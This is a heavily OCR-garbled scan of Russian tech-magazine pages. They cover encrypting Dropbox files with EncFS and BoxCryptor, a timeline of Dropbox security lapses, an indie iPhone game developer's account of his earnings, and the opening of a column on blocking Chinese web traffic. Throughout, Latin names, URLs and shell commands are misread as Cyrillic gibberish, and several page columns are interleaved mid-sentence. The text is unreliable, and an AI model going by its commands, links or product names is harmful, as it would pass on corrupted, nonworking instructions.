даже и не заметили бы проблемы, если бы информацию обуязвимо- 
сти не опубликовал независимый есигйу-исследователь [разеф!п. 
согп/УВКмОУ6Т). За последнее время это уже не первая щекотливая 
история, связанная с безопасностью файлов, которые пользователи 
со всего миратак охотно доверяют облачному хранилищу Огорбох. 
Тутнадо напомнить, что с самого начала существования сервиса 
разработчики заверяли пользователей, что ответственно подходят к 
безопасности данных. Так, все файлы во время синхронизации пере- 
даются исключительно по защищенному 55 -соединению, а хранят- 
ся на сервере в зашифрованном виде [АЕ$-256}. Изменив недавно 
пользовательское соглашение, те же самые люди недвусмысленно 
дали понять, что лишь ограничивают доступ к файлам для своих со- 
трудников, но при появлении необходимости, втом числе по запросу 
правоохранительных органов, Огорбох непременно предоставит 
доступ каккаунту любого юзера. Воттакое шифрование. 

Я не параноик и скрывать мне, вобщем-то, нечего, но открывать 
кому-либо свои личные файлы мне совершенно не хочется. К тому же 
я всегда был не в восторге оттого, что данные в открытом виде лежат 


> 024 


на каждом компьютере, который засинхронизирован с моим аккаун- 
том ОгорБох. Самое время все это безобразие поправить. 


Поднимаем ЕпсРЪ 


Справедливости ради стоит сказать, чтоу сервиса есть официаль- 
ный мк! (мик. дгорбох.сого), где приведены конкретные советы по 
тюнингу безопасности. Железобетонная правда заключается втом, 
что данные необходимо шифровать на локальной машине, а в облако 
их передавать уже в закриптованном виде. В частности, предлагается 
разместить в папке ОгорБох’‘а контейнер ТгиеСгур или ЕгееОТЕЕ и 
уже внутри него хранить все конфиденциальные документы. Метод 
действенный — не поспоришь: даже если аккаунт будет скомпроме- 
тирован, злоумышленник не сможет расшифровать данные. И все бы 
было хорошо, если не одно «но». При таком подходе можно забыть о 
рациональной синхронизации файлов: при изменении любого до- 
кумента будет синхронизироваться весь криптоконтейнер целиком, 
какого бы размера он ни был [например, 1 Гб). Ктому же, в этом случае 
теряется важная опция Огорбох ‘а, позволяющая откатить любые из- 
менения и вернуться к произвольной версии файла. К счастью, более 
изящное решение предлагается все втом же умК! — использовать 
н[е-бу-е-шифрование, то есть применять криптографию для каждого 
из файлов в отдельности. Для этого идеально подходит ЕпсР5, вирту- 
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ЭЗресйу {Ле разэмгога м СН 6 изед фо епсгур! эпд десгур Ве даа. 


М ему раззугогд: 
УМепбу раззугога: 


Фобос вов ово 


к. 


альная криптографическая файловая система. При монтировании 
ЕпсЕ5 указывается директория-источник (исходная директория сза- 
шифрованными файлами, которая может располагаться в Огоррох'е] 
и точка монтирования. После монтирования каждому файлу в 
директории-точке монтирования соответствует определенный файл из 
зашифрованной директории. Таким образом, ты работаешь с файлами 
в открытом виде, а ЕпсЕ5 прозрачно размещает их зашифрованные 
версии внутри Огорбох‘а. Поскольку каждый файл криптуется в отдель- 
ности, Огорбох может синхронизировать изменения инкрементально 
для каждого из них. Это очень добротная технология, которая давно 
используется под Мпих’ом и основана натехнологии РО$Е (ЕЦезу&${епп 
п Узегорасе}, позволяющей программистам создавать виртуальные 
файловые системы. Несмотря на свои корни, ее сейчас можно успешно 
использовать как под Мас 05 Х, таки \/Ип9ом/5. Начнем с последней. 


МЛпао\м/$ 

После неприятной истории с системой авторизации Огоррох пред- 
приимчивые немецкие ребята оперативно зарелизили утилиту 
ВохСгуртог [млллм/.Бохсгур{ог.сога], которая создает в системе вирту- 
альный криптографический диск. Каждый помещенный на него файл 
автоматически шифруется с использованием стандарта АЕЗ-256. 
Физически зашифрованные данные размещаются в произвольной 
директории, например, в папке Огорбох, вто время как на вирту- 
альном диске они находятся в открытом виде, икним без проблем 
можно обратиться излюбого приложения. Разработчики поступили 
очень мудро и не стали изобретать велосипед, а просто реализовали 
основные возможности ЕпсЁ5 для использования под \Ип9ом/$. И 
пусть ВохСгур{ог поддерживает пока не все возможности технологии, 
но этого вполне достаточно для надежной защиты данных. 
Приложение после установки автоматически определяет папку, 
используемую Огорбох’ом, и предлагает разместить в ней директорию 
с зашифрованными файлами. Для шифрования данных тебе необхо- 
димо придумать парольную фразу, а также выбрать букву для диска, 

на котором будут располагаться файлы в открытом виде. Если ты не 
хочешь, чтобы данные без твоего ведома находились в открытом 

виде, пароль можно не сохранять и вводить его каждый раз, когда ты 
будешь монтировать диск. Поставив галку напротив «Адуапсеа Моде», 
ты получишь доступ к некоторым тонким настройкам ВохСгуртог. Это в 
частности может потребоваться, если есть необходимость использо- 
вать возможность Огорбох‘а для отката к предыдущей версии файла. 
Дело в том, что ВохСгур{ог по умолчанию шифрует и имена файлов, 
превращая их в абракадабру, тем самым мешая работе системы верси- 
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онности, которая реализована в Огорбох. Поэтому если такая возмож- 
ность тебе нужна, то шифрование имен файлов придется отключить. 

С этого момента ты должен увидеть директорию ВохСгур{ог внутри 
своего Огоррох'а, а в системе должен появиться виртуальный диск (У 
меня — Х:]. Теперь у тебя в ОгорБох'е есть папка, где ты можешь хра- 
нить конфиденциальные файлы. Тут важно запомнить два важных пра- 
вила. Первое — никогда не сохраняй файлы напрямую в директорию 
ВохСгур{ог, это место, где данные хранятся в зашифрованном виде (и в 
таком же виде синхронизируются с облаком]. Поэтому работать с доку- 
ментами надо через тот самый виртуальный диск. И второе — никогда 
не удаляй из папки ВохСгур{ог файл епс!56.хп(. В нем находится 
важная для ЕпсЁ5 информация, которая необходима для того, чтобы 
дешифровать данные. В бесплатной версии программы можно соз- 
дать логический раздел, объемом не более двух гигабайт, то есть ровно 
такого же раздела, сколько по умолчанию предоставляет Огорбох. На 
случай, если тебя это ограничение не устраивает, и деньги платить не 
хочется, есть открытая реализация ЕпсЕ5 для \\Ипдом/5 — епсЁ54мип 

(9 Копочц5.ого/епсЕе4мип). В ней, само собой, никаких ограничений нет. 
В основе, как и в случае с ВохСгур{ог лежит библиотека ПоКап [Чокап- 
Чему. пе], которая является аналогом ЕЦЗЕ под \\Мп9о\м/$ и необходима 
для монтирования в системе сторонних файловых систем. 


Ипих 

Во многих дистрибутивах И/пих все необходимое для использования 
ЕпсЕР5 встроено по умолчанию, но это не всегда упрощает задачу. Важно 
использовать самую свежую версию разработки (>= 1.7}, в которой был 
исправлен ряд ошибок. А во многих дистрибутивах, к сожалению, по- 
ставляется более старый релиз (чаще всего 1.6}. Это, кпримеру, касается 
ОБигки 10.10, которая установленау меня на одном из ноутбуков. Боль- 
шой проблемы здесь нет. Нужно лишьустановить новую версию ЕпсЕ5 и 
для удобства работы снейеще СЧ|-утилиту СгурКеерег: 


5идо ар*-веф 1п$5%а11 епс+5 сгур{Кеерег 


После окончания установки мы можем запустить Сгур{Кеерегчерез 
меню «АррИсаНопз -» Зу$ет Тоо[5 - Сгур{Кеерег» и импортировать 
зашифрованную директорию: 
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Криптодиск Х: 


1. В области уведомлений выбираем «Сгур{Кеерег - |гпрогЕ ЕпсЕ5 
то{4ег». 

2. Далее указываем директорию, где находятся зашифрованные 
файлы [то есть папку ВохСгур{ог"а). 

3. И определяем желаемую точку монтирования, через которую мы 
сможем обращаться к данным в открытом виде. 

После этого в меню СгурКеерег появится пункт для быстрого 
подключения тома ЕпсЕ5: например, «Сгур{Кеерег > /Ноте/${ер/ 
Ооситеп{($/5ае». После ввода пароля в системе появится необхо- 
димый намтом с расшифрованными файлами. Можно было обойтись 
и без всяких 6 М|-утилит, просто подключив ЕпсЕ5-том в консоли: 


епс+$ ^/Огорбох/ВохСгурфог/ —/ВохСгурфог 


Первый параметр указывает на расположение зашифрованного 
тома, а второй — наточку монтирования файлов в открытом виде. 


Масо$5х 


Установка ЕпсЕ$ под Мас 05 Х, пожалуй, сложнее всего реализуется 
из-за необходимости инсталлировать дополнительные инструменты. 
Но это все равно не займет много времени, аустановленные инстру- 
менты все равно ещене раз пригодятся в работе. Главная загвоздка 
тут втом, что все распространяемые бинарники ЕпсЕ5 для макоси 
безнадежно устарели, поэтому нам придется все с\обирать вручную. 
Порядок действий здесь такой: 

1. Чтобы сразу обзавестись компилятором и другими необходимыми 
инструментами для сборки ЕпсР5, лучше всего установить пакет 
разработчика. ХСоде(Чеуеюрегарр(е.сого). Идеально подойдет бес- 
платная 3-я версия. 

2. Далее потребуется МасЕЦ5ЗЕ (соде.доод({е.согп/р/гпасвизе), порти- 
рованная под Мас 05 Х версия проекта ЕЦЗЕ, который в свою очередь 
использует ЕпсР5. Просто запускаем загруженный МасЕИЗЕ.рко, и 
установщик все сделает сам. 

3. Далее можно было бы установить уже и сам ЕпсЕЪ, но так как 

это проще всего сделать через менеджер пакетов (а конкретно 
Ноппебгем/, то придется заинсталлить и его: 
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4. Воттеперь мы можем загрузить исходники ЕпсЕЪ и собрать иху 
себя на компьютере. Нотебгем/ сделает все за нас, подгрузив все 
необходимые зависимости [не зря же мы его ставили]: 


Бгем 1п$%а11 епс+$ 


5. Все — ЕпсР5 в системе! Можно зайти втерминал и примонтировать 
к системе каталог ВохСгур{ог а [чаще всего это -/ОгорБох/ВохСгуртог] 
в ту папку, где будут располагаться файлы в открытом виде (скажем, -/ 
ОгорБох/ВохСгур{ог]: 


епсф$ ^/Огорбох/ВохСгурфог -^/ВохСгур®ог 


От работы в консоли избавит отличная СУ|-утилита МасГиюп 
([млллм/.гпасфизюпарр.ога] с подключенным плагином для поддержки 
ЕпсРб ({КБепакедгтап.могаргез$.сого/епсЁ5}. 


Выбираем альтернативу 


ВохСгуртог и ЕпсР, в принципе, не единственная разработка, 
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Доступ к шифрованным 
файлам через веб 


При использовании ВохСгурфог ты уже не сможешь просмо- 
треть защищенные файлы через веб. Точнее говоря, скачать-то 
их можно, но только в зашифрованном виде. Выручить может 
Рома Це-версия ВохСгуртог, которая поможет расшифровать 
загруженные из облака файлы. Правда, если ты не отключил 
шифрование имен файлов, то найти нужные документы может 
быть ой как непросто. Имей это в виду. Вообще РоцаЦе-версия 
ВохСгуртог предназначена для использования в тех ситуаци- 
ях, когда у пользователя ограничены права в системе. Она, к 
слову, отлично ладит с перемещаемой сборкой Огорбох’а — 
ОгорБохРо{аЩеАНК [9горроаБе.Во.агп]. 


МасГ45!оп 
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Настраиваем ЕпсР5 под Мас 05 Х 


предлагающая дополнительный слой шифрования поверх Огорбох. 
Аналогичный функционал (с шифрованием по АЕбЗ-256] предлагает 
также 5есге{бупс [де{ъесге{упс.сого/55}. На официальном сайте 
проекта сейчас доступны версии для \/п9ом/5 и Шпих, а релиз для 
0$ Х обещается в самом ближайшем будущем. Правда, написан 
клиент на /а\уа, а я при всем своем уважении к этому языку про- 
граммирования, очень не любою реализованные с его помощью 
десктопные приложения. 

Так что можно сказать, что ВохСгуртог повезло :]. Попробуем теперь 
посмотреть на проблему с другой стороны. Раз сам сервис не вы- 
полняетте обязанности, которые мы отнего ожидаем, то может 
быть его просто поменять на что-то другое? Задача, как ни крути, 

не уникальна — есть целый ряд проектов, предлагающих синхро- 
низацию файлов между разными компьютерами и устройствами, 
но со значительно большим упором на безопасность данных. 

Один из наиболее нашумевших из них — \\чца(а ([млллиммиа(а.сопп}, 
который позиционируется создателями как «безопасное онлайн- 
хранилище». Сервис в последнее время агрессивно развивается 

и предлагает практически все те же самые возможности, что естьу 
ОгорБох а. Уже сейчас доступны клиенты для \\Ипдо\миз, Мпих, Мас, а 
также 'РБопеи Апаго!а. 

Для аутентификации \\"ца[а использует стандарт К5А-2048, а для 
шифрования файлов — АЕ$-128. Безопасность добавляетещеи 
распределенный подход сервиса кхранению ресурсов. Дело втом, 
что в основе сервиса лежиттехнология, снижающая затраты сер- 
веров благодаря использованию простаивающих ресурсов. Когда в 
хранилище добавляется новый файл, он шифруется и разбивается 
на большое количество фрагментов. Угадай, где размещаются эти 
фрагменты? В облаке и... компьютерах других пользователей. Да-да, 
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Хроника фейлов ОгорБох 


7 апреля — исследователь Дерек Ньютон рассказал в своем 
блоге [Б\.\у/9горБох_ а] некоторые подробности об автори- 
зации Огорбох. Оказалось, всю информацию для аутентифи- 
кации программа хранит в файле сопйд.4Ъ. Он находится в 
%АРРВАТА%\ОгорБох и представляет собой базу данных 5@е. 
Среди многих других полей одно из них — Во${ 14 — наиболее 
интересное. Оно определяется клиентом после первой авто- 
ризации и не меняется со временем. И вот в чем засада. Его 
значение никак не привязано к системе. Скопировав сопй(д. 

ЧБ на другую машину, злоумышленник легко получает доступ к 
данным чужого аккаунта. Без уведомления пользователя! Более 
того, даже если юзер сменит логин и пароль, тоже ничего не 
изменится — Поз{_14 все равно останется валидным. На данный 
момент идентификатор привязывается к конкретному устройству 
и может быть отозван через веб-интерфейс. 


19 апреля — Огорбох меняет пользовательское соглашение, 
напрямую заявляя, что при необходимости может расшифровать 
файлы пользователей и предоставить их для следствия по зако- 
нам США. 


26 апреля — на СиНиБ’е появляется открытый проект Огор$ р 
([аиВуб.согп/Чнмегдап/9гор$Р!р], позволяющий быстро полу- 
чить в своем аккаунте любой файл, который есть в облаке 
Огорбох. Все, что необходимо, — знать его хэш. С автором 

— Владимиром ван дер Лааном — тут же связался главный 
технический директор сервиса и вежливо попросил убрать 
исходники. Пользователи программы отреагировали созданием 
многочисленных зеркал проекта на ЧЦВиВ и на самом Огорбох. 
В течение короткого времени им также пришла просьба пред- 
ставителя Огорбох о немедленном удалении файлов проекта. 


19 июня — в работу сервиса был запущен релиз с серьезной 
уязвимостью в системе авторизации. В результате любой поль- 
зователь мог зайти в чужой аккаунт, не зная пароля. ОгорБох 
оправдывается, что за время, которое ушло на исправления 
уязвимости, вход осуществляли менее 1% пользователей. 


сервис предлагает юзерам программу «торговли» своими мощностя- 
ми. Все честно: если пользователь поделится частью своего диска 

с сетью \\Гца[а, он получает дополнительное пространство в облаке 
(для этого необходимо, чтобы компьютер был включен не менее 4 
часов в день). 

Таким образом, жесткие диски \\ца[а-юзеров составляют распреде- 
ленную сеть, которая используется сервисом для улучшения скорости 
загрузки файлов, доступности и сокращения своих расходов. Чтобы 
гарантировать, что данные никогда не будетутеряны, применяются 
алгоритмы коррекции ошибок и серьезная избыточность. На старте 
пользователю бесплатно выделяется 1 Гб, ноон может прокачать акка- 
унтза счетреферальной программы, привлекая другихлюдей [также, 
какв ОгорБох"е], атакже «продажи» своего дискового пространства. 
По правде говоря, полностью перейти на \\ца(а я пока не решился. 
Есть несколько мелочей, которые пока мешают это сделать. В моей 
папке ОгорБох есть несколько общих папок, которые мы активно 
используем с другими сотрудниками для совместной работы над 
документами. Это значит, что перейти на \\ца[а придется всем. 
Приложение для мобильного телефона, хотя и предоставляет 
доступ к файлам в облаке, но пока сильно ограничено в возможно- 
стях. А интерфейс для доступа к файлам через браузер реализован 
через тормозной /ауа-апплет. Поэтому связка Огобох+ВохСгуртог 
— мой выбор на данный момент. Все работает, все привычно, все 
безопасно — короче говоря, мне нравится. == 
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а Путь дате-разработчика: 
О ЕЯ таз К ры, для {Рпопе 


Ассоит: иио@ тас$1ог... 


С. = р 
Чуть больше пары лет назад я сидел дома и смотрел в только что 
приобретенный МасВоок Рго. Задача была простая — умудриться 
в короткие сроки портировать на 'РПопе свою флеш-игрушку Кад- 
40| Саппоп. Опыта не было, язык ОШеснуе-С казался диким и 
неприступным, а система Мас 05 — непривычной. 


Как все начиналось реализовывать все самому, я просто взял готовый движок Бох24], 
Все началось с того, что в 2008 году я за шесть дней смастерил на графика, написанная шариковой ручкой, и бэкграунд из мятого 

Е азВ’е игрушку КаддоЦ Саппоп. Весь геймплей крутился вокруг листка тетрадки в клеточку. Но это хулиганство не прошло незаме- 
пушки, которая стреляет маленькими смешными человечками. Это = ченным. Высокие оценки игровых порталов, какие-то призовые ме- 
все больше походило на баловство: очень простая физика (чтобы не ста — все говорило отом, что эта сазиа(-игрушка людям нравится. 
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Кадао! Саппоп. Неказистее не придумаешь 


Первая часть принесла мне всего $600, набор уровней 
для нее — еще $600, а вот вторая часть — уже $8000. 
Третья, как продолжение уже очень успешной серии, 
оказалась самой прибыльной, и заработанные на ней 
$25 000 окончательно убедили меня втом, что делать 
игры не только чертовски увлекательно, но и матери- 
ально интересно. С КаддоЦ Саппопя и начал свой путь 
во Г[азВ-индустрию, где позже достиг, как мне кажется, 
хороших результатов. Собственно обо всем этом было 
рассказано в моей статье «Какя стал зарабатывать на 
играх» в номере 09/2010 журнала 1. 


Как крадут идеи 

Позже наступил момент, когдая понял, что пора вы- 
ходить стакой хорошей игрой на рынок, где живутеще 
большие деньги. АррЫ{оге — тот самый магазин, где 
продаются приложения для 'РВопелРод9//Рач. По- 

чему не попробовать? Все оказалось непросто. Язык 
Об]есНуе-С, на котором в основном разрабатывают- 

ся приложения для (РВопеЛРад, давался тяжело. С 
мертвой точки ситуацию помог сдвинуть сосо$24, один 
из самых известных движков, которые значительно 
облегчают создание игр для 105. Через несколько дней 
экспериментов появилась какая-то работающая по- 
делка. Вдохновение проснулось, первые результаты 
[это всего лишь были падающие на неподвижную балку 
кирпичи] не могли не радовать, и я уже видел, как мои 
маленькие рагдоллы летают по экрану ай-девайса. Но 
донесся до меня слух, что в Арр5{оге появилась игрушка 


КаддоЦ Ва‹ег. Немедленно установив ее на свой 
девайс, я понял, что слегка опоздал со своей игрой. 
КаддоЦ В[а$ег — это не просто клон, а жесткий рип-офф 
с КаддоЦ Саппоп’а. Ушлые ребята, конечно, прикрути- 
ли пару новых фишек и переделали почти все уровни, 
но жесткое заимствование было налицо. В тотденья 
сильно напился. Завтрашние жалобы вАррЕе ничего не 
дали, ушлые негодяи стали запугивать меня адвока- 
тами, встречными исками и прочим. Дух был сломлен. 
Разработку под 105$ я основательно забросил, вернув- 
шись к заработку на флеш-играх. 


Какяузнал об издателях 


Спустя год я получил письмо от одного немца, который 
интересовался моими Н!азВ-играми. Суть его пред- 
ложения былатакова: я портирую несколько игр на 
айфон, а он, то есть его фирма-издательство ЕОС- 
ЕжегатитепЕ, продвигает их в Арр5{оге. Как бы между 
прочим он упомянул о Каддо[ В[а$ег’е. Оказалось, 

что игра заработала ушлым негодяям за время своего 
существования в эппловском магазине больше двух 
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Рвузс$ Сатербох. Первая игра в АррЫюге 


миллионов долларов [на данный момент вместе со 
второй частью — всетри). Что мне оставалось делать 

:)? Закипела разработка. ОБесНуе-С уже не казался 
сумасшествием, хотя, надо сказать, код все-таки рож- 
дался в муках. Сейчас, иногда просматривая исходники, 
хочется поскорее их закрыть, потому что это тихий ужас 
для любого мало-мальски толкового кодера. Стоило 
мне представить, что в работающий код нужно вставить 
что-то еще, так сразу хотелось бросить все нафиг. Через 
несколько месяцев мы выпустили в Арр5{оге первый 
наш совместный с ЕОС проект — РБуз1с$ батерох. 
Приложение включало в себя две игры: Каддо[ Саппоп 


ие 


[НТТР://МИМИМ 


р ИпК5 
® Блогавтора: 
мимлм. | опппу-К.ги. 


® Пример разработки 
простейшего прило- 
жения на сосо$24 для 


и Роу-Ро|у Саппоп [также очень успешная Е(азВ-игра). |Рропе: 
И вотуже через некоторое время я уже трезво оцени- БабгаВабг.ги/6{09$/ 
вал результаты работы. Нет, это не был «первый блин ппасо$х4е\/122383. 


КОМОМ». Общий заработок с этого приложения составил 
более ста тысяч долларов, которые поделили мы втроем 


® Разработка под 
|РВБопе 05. Курс моло- 


[Арр(е по договору забрал 30 процентов, остаток раз- дого бойца: 
дербанили мы с издателем). Это был очень неплохой Бабгабабг.ги/6{09$/ 
прорыв в смысле доходности, но тут же, как это обычно пасозх4еу/86597. 


бывает, захотелось большего. 


Как мы начали большой 
проект 


К этому моменту я понял, что одиня не могу сделать 
все, что запланировал. Поэтому со своей прошлой 
работы я утянул двух своих новых сотрудников. Втроем 
веселее, ктому же, можно уже не париться тестиро- 
ванием и изготовлением игровых уровней — за тебя 
это делают другие, аты наслаждаешься творчеством. 
В активе была готова и очень успешная Е(азЙ-игра 
Соуег Огапде. Что мы сделали? Правильно, решили 
портировать ее под 105. По сути, это опять же очень 
простецкая игрушка. На уровне сидит апельсин с 
глазами и ртом. Шевелится, подмигивает. На каждом 
уровне игроку предлагается несколько предметов, 
которые можно разместить (сбросить сверху) таким об- 
разом, чтобы апельсин оказался в укрытии. Для чего? 
Для того, чтобы мерзкая тучка, которая вылезет из 
края экрана не смогла добраться до апельсина своими 
ядовитыми каплями-колючками. Детско? Ато! Просто? 
Ну, ато! Сумасшедше? Конечно! Но чем бредовее, тем 
лучше! Добавь сюда премилую анимацию персона- 
жей, зловещий смех тучки [озвучено вашим покорным 
слугой}, веселую музыку из «Деревни дураков» — и 
получаем отменную игру. Е[азП-версии Соуег Огапде 
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77% 


Апельсины + Тучки = Соуег Огапде 


имели большой успех: общее количество их просмотров на 
данный момент приближается к 100 миллионам. Немецкие из- 
датели активно подбадривали: «Давайте портировать на {РВопе/ 
|Рад — это будетхит!» И мы стали делать хит. ОБесйуе-С был 
родным и правильным: если и встречались мелкие непонятности, 
то решались они быстро. А если не быстро, то только оттого, что 
непонятности росли из библиотеки сосо$2а. Но движок разви- 
вается так быстро, что скоро все недочеты испарились. Хит мы 
делали вдохновенно, сразу же сочинили 80 интересных уровней. 
Картинка была очень хороша и всем нравилась. Играть в игру на 
|Рад’е было одно удовольствие, на айфоне все хотя и было сильно 
мельче [большим пальцам не развернуться), но все все равно 
были в восторге. Правда, в этот моментАрр(е выпустила 1РПопе 4 
со своим дисплеем Кейпа, что добавило нам работы. Но в итоге 
игра смотрелась на этом девайсе просто великолепно, всем по- 
нравилосьеще больше. 


Как мы стали Арре-манами 


К тому времени мы обросли кучей эппловских девайсов. Было два 
айпода (третьей и четвертой серии), три айпада для постоянных 
тестов, два аймака, два нотбука отАрр(е, один четвертый айфон, 
айфон 395 итеперь уже старенький айфон 394. С издателями мы 


Текущая версия игры. 688 пятизвездочных оценок. И 
жалких 3 однозвездочных. 
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Среда разработки Хсоде 


работали без каких-либо финансовых вливаний сих стороны: все 
покупалось на свои деньги. И знаешь что? Скажи мне кто-нибудь в 
2008 году, что по офису-квартире будут валяться все эти сумасшед- 
шие в своем количестве девайсы, я бы притворился, что не знаком 
с этим человеком. Но потраченных денегя, как правило, не жалею. 
Да и как выясняется, чем больше их тратишь, тем больше они ктебе 
липнут. Свобода действий кружила голову, свобода творчества без 
ограничений пьянила. 


Как мы почувствовали успех 


В ноябре 2010 года мы запустили Соуег Огапде в Арр.{оге в версии 
для Рад, продавая игру за $1,99. Игра разрабатывалась почти три 
месяца, а всего за несколько дней добралась до американского Тор 
25 (того самого желанного топа). К этому же времени русский топ 
был полностью покорен. Мы были самой лучшей игрой для айпада 
в России! Через некоторое время вышла и версия для 'РПопе. Ее 
стоимость была установлена в 99 центов. Игра получала сумас- 
шедшие рейтинги. Средний рейтинг по пятибалльной системе 
АппСтора был пять полных звезд! Комментарии писали самые 
разные категории геймеров: родители, которые умилялись оттого, 
как нравится игра детям, молодые парни, которые удивляли игрой 
своих девушек, и взрослые дядьки, которые показывали игру своим 
бизнес-партнерам. Люди были покорены, и мы этому были очень 
рады. 

Конечно, сделав игру, глупо было останавливаться. Купившим 
ее требовалась доза новых уровней. И мы делали новые уровни. 
В один моментмы даже запустили конкурс среди читателей 
моего блога, где разыгрывались призы от Арр(е на лучшие 
уровни. Борьба получилась веселой, жесткой и продуктив- 

ной. Сейчас игра насчитывает 200 уровней, а чтобы пройти их 
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Инструкция к применению 


Про девайсы 

Чтобы разрабатывать на 'РПопе, хорошо бы обзавестись самим 
|Рпопе. Необязательно сразу, потому что на первых порах можно 
обойтись симулятором. Но надо иметь в виду, что приобрести его 
рано или поздно придется. Можно обойтись и более дешевым 
вариантом — плеерами 1Роа Тоисв, которые практически не отли- 
чаются от 'РПопе, кроме того, что не имеют С5$М-модуля. Помимо 
этого нужен компьютер Мас, причем обязательно на |п{е|- 
платформе. Штука не из дешевых, но без нее не обойтись. Опять 
же поэкспериментировать можно на хакинтоше (хотя лично я не 
буду его советовать, поскольку настройка и установка отобьет вся- 
кую охоту к изучению и программированию). А можно пойти еще 
более радикально и запустить Мас 05 Х на виртуальной машине 
(Читай статью «Мас05 Х + Мпиа!Вох = любовь», БИДу/ПЛОес). Но 

в любом случае, на какие бы ухищрения ты не шел, если хочешь 
заняться разработкой под (05 серьезно, то Мас и 'РБопе/Рач 
придется купить. Большинство из вас плюнут и скажут «не-е». И 
зря. На лежачий камень и болячка не сядет. 


Про инструменты разработки 

Для разработки приложений под 1РПопе 05 необходимо скачать 

и установить 'РВопе 5ОК (деуеорегарр(е.сопЛрВопе). Весит 

этот пакет около трех гигабайт и включает в себя 10Е (ХСо4е]}, 
компилятор (ССС), отладчик [СОВ}, набор библиотек и заголов- 
ков, симулятор 1РПопе и некоторые дополнительные утилиты. 
ХСоде не такая привычная ПЕ, как, скажем, Мзиа[ З{и9 0, но на 
деле — очень удобная и предлагающая много возможностей. 
Примечательно, что средства девелопера Арр{е предоставляет 
бесплатно, а платить придется только за подписку разработчи- 

ка (она необходима, если хочешь продавать приложения через 
Арр5тоге]. Для написания программ под 'РВопе предлагается 
использовать язык ОШесйм\е-С. При этом есть возможность писать 
так же на С и на С++, но это скорее опциональный вариант. Не 
беда, в Сети сейчас огромное количество статей для начинающих 
и полноценных книг по ОБ]|-С. Что до меня, я вообще мануалами 
обзавелся, когда уже был работающий прототип игры. Причем 
опыт у меня весьма небольшой: немного /ауа и Аспоп5спри 3. А 
прототип появился после изучения примеров движка сосо$24. 
Последний обладает хорошим комьюнити и большим количеством 
заготовок. Бери пример — и давай его ломать, изменять! А там и 


все, потребуется не меньше трех-четырех часов. Не могло не 
радовать, что дружба с ОБ]еси\уе-С помогла избавить игру от 
вылетов и прочих неприятностей еще на стадии разработки. 
Если и случались гневные комментарии, то только не по поводу 
вылетов. «Слишком простая игра», «игра для детей», «я прошел 
ее за пять минут», — писали маленькие дети, желающие казать- 
ся взрослыми. По какой-то причине приложение не нравилось 
только Арр(е. Практически любая мало-мальски хорошая игра, 
стоитей выйти в АппСторе, получает некое промо от магазина: 
компания помещает игру в раздел «новые и примечательные», 
а самые хорошие игры удостаиваются больших баннеров на 
главной странице. Мы не получили из этого почти ничего. Ви- 
димо, какие-то проблемы у Яблока с Апельсинами. Но нас это не 
сильно волновало. 


Как мы считали прибыль 


За полгода существования игры в АппСторе, Соуег Огапде зарабо- 
тала больше полумиллиона долларов. И по-прежнему продолжает 
приносить деньги. Издатель постоянно придумывает какие-то 
промо-акции, чтобы поддерживать интерес и постоянно напоми- 
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до прототипа недалеко. Подход, вероятно, не самый удачный, но в 
моем случае сработал. 


Про работу с издателем 

Как только смастеришь прототип игры, где уже будет несколько 
играющих уровней, можно искать издателя. Заходи в АррЗоге, 
анализируй успешные игры, гугли название издателя и пиши ему 
письмо. Для чего это нужно? Издатель очень полезен в плане 
советов по игре, доработке ее до готового к продаже продукта. Он 
же может предоставить членство в той самой девелоперской про- 
грамме, подсказать, как выдержать все соответствия игры перед 
требованиями проверяющей команды Арр(е, поделиться хорошей 
системой статистики, через которую очень наглядно отслежи- 
ваются рейтинги [чаще всего — аррЙаиге$.соп?), комментарии 
пользователей и даже заработанные деньги. Ты можешь спро- 
сить: «Зачем, собственно, издатель?» Есть же примеры, когда 
некий малолетний мальчик мастерит игру и она срывает башню 
как Арр(е, так и всем средствам массовой информации. Запомни 
раз и навсегда — это не про тебя. Не про меня, ни про кого. 
Единичные случаи успеха — это единичные случаи успеха, 99% 
одиночек умирают в АппСторе. Потому что просто не знают, как 
издаваться, где рекламироваться, как продвигать приложения. 
Издатель знает, и за это он берет деньги. Его вознаграждение 

— это всегда доля выручки. В зависимости от издателя она коле- 
блется от 30 до 50 процентов после вычета тридцатипроцентной 
доли АррЁе. Издатель знает, где написать про игру, на какие сайты 
ее забросить в ожидании рецензии, какой форум подключить 

для подпитки интереса. Он знает, какие акции запускать, какие 
инструменты использовать, и каких партнеров мобилизовывать 
для дополнительных промо-акций. Он же и занимается сноше- 
ниями с АррЕ, выкладывая в АппСтор игру и обновления, отсле- 
живает письма в техподдержку. Не менее важна легальность 
всего происходящего. С издателем заключается договор, по этому 
договору он переводит тебе деньги, которые очень легко обо- 
сновываются перед государством (чтобы заплатить с них налоги). 
Будь ты ИП, 000 или даже простым физическим лицом — неваж- 
но. Но если ты окажешься смельчаком, посягнувшим на АппСтор 
в одиночку, бюрократия съест тебя еще на стадии заполнения 
документов. Каждый должен заниматься своим делом. Ты дела- 
ешь продукт, а продавец в лице издателя его продает. 


нать о себе. Рождаются и новые фишки. Сейчас мы прикручиваем 
возможность продажи подсказок в самой игре. Застрял на уровне 
так, что ну вообще не представляешь как его пройти, — нажми 
кнопку, и уровень пройдется сам по себе. Такая опция будет стоить 
$0,99. Возможно и мелочь, ноу издателя есть проверенные данные, 
что некоторые игры зарабатывают натаких штуках сотни тысяч 
долларов. Не обходим стороной и новые платформы. Недавно мы 
смастерили версию игры для десктопной Мас 05. Хвала сосо$24 — 
это было предельно просто. Потребовалось только притянуть игру 
не под тач-интерфейс, а подуправление мышкой или тачпадом. 
Похвастать тут пока нечем, но работа по продвижению ведется. 
Причем игра продается в еще совсем новом эппловском изобрете- 
нии — Арр5Коге для Мас 05. 

Что мы делаем сейчас? Продолжаем делать флеш-игры. Казалось 
бы — зачем, если есть более прибыльный рынок? Флеш-платформа 
хорошатем, что игры разрабатываются быстро, их можно обка- 
тать на большой аудитории и собрать пожелания. Удачно пошла 
флеш-версия? Значитмы ее портируем. А это еще и по-прежнему 
довольно прибыльное дело. Но основная платформатеперь — это, 
конечно же, 1051 == 
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КОЛОНКА 


РЕДАКТОРА 


Прото, как блокировать китайцев 


© Недавно столкнулся с проблемои: на сайт в огромном количестве повалил 
китайский трафик. Оказалось, что одна из размещенных на моем хосте 
картинок попала в китайские блоги. Провайдер, у которого я арендую сервер, 
тут же забил тревогу о несоответствии соотношений (три кдвум) российского 


и зарубежного трафиков. 


Переплачивать естественно не хотелось, 
поэтому я быстро выровнял соотношение 

и начал думать, как исправить ситуацию. 
Собственно, выход в своей ситуации я 
видел один — блокировать трафик с китай- 
